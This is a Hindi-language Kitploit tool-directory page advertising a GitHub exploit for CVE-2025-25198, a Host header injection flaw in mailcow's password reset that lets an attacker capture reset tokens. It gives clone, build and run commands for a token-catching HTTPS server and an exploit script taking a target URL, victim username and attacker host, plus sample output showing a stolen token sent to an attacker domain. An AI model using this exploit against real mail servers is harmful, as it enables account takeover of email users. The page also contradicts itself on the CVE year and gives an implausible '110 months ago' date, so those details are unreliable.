Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25198 — मेलकाउ होस्ट हेडर इंजेक्शन हमलों से पासवर्ड रीसेट टोकन कैप्चर करता है। | Kitploit
उपकरण/GitHubGitHub/enzocipher/cve-2025-25198
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

मेलकाउ होस्ट हेडर इंजेक्शन हमलों से पासवर्ड रीसेट टोकन कैप्चर करता है।

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-25198

mailcow: dockerized डॉकर पर आधारित एक ओपन सोर्स ग्रुपवेयर/ईमेल सूट है। संस्करण 2025-01a से पहले, mailcow की पासवर्ड रीसेट कार्यक्षमता में एक कमजोरी है जो हमलावर को Host HTTP हेडर में हेरफेर करके एक पासवर्ड रीसेट लिंक उत्पन्न करने की अनुमति देती है जो हमलावर-नियंत्रित डोमेन की ओर इंगित करता है। यदि कोई उपयोगकर्ता जहरीले लिंक पर क्लिक करता है तो यह खाता अधिग्रहण का कारण बन सकता है।

यह कैसे काम करता है?

सभी अनुरोधों को सुनने के लिए एक https सर्वर सेट करता है और आपके चयनित के साथ Host हेडर के साथ वेबसाइट पर एक POST अनुरोध भेजता है। आप अनुरोध भेजने और सर्वर में टोकन प्राप्त करने के लिए Burpsuite का भी उपयोग कर सकते हैं।

विशेषताएं

  • HTTPS सर्वर जो पासवर्ड परिवर्तन टोकन प्राप्त करता है
  • एक्सप्लॉइट स्क्रिप्ट जो वेबसाइट की कमजोरी पर हमला करती है।
  • सब कुछ ठीक कर दिया गया है और अब openssl की आवश्यकता नहीं है

पूर्वापेक्षाएँ

  • Go 1.16 या उच्चतर

सर्वर स्क्रिप्ट

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

एक्सप्लॉइट स्क्रिप्ट

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

थोड़ी देर प्रतीक्षा करने के बाद सर्वर वह टोकन आउटपुट करेगा जिसका आप उपयोग कर सकते हैं:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
टूल डाउनलोड करें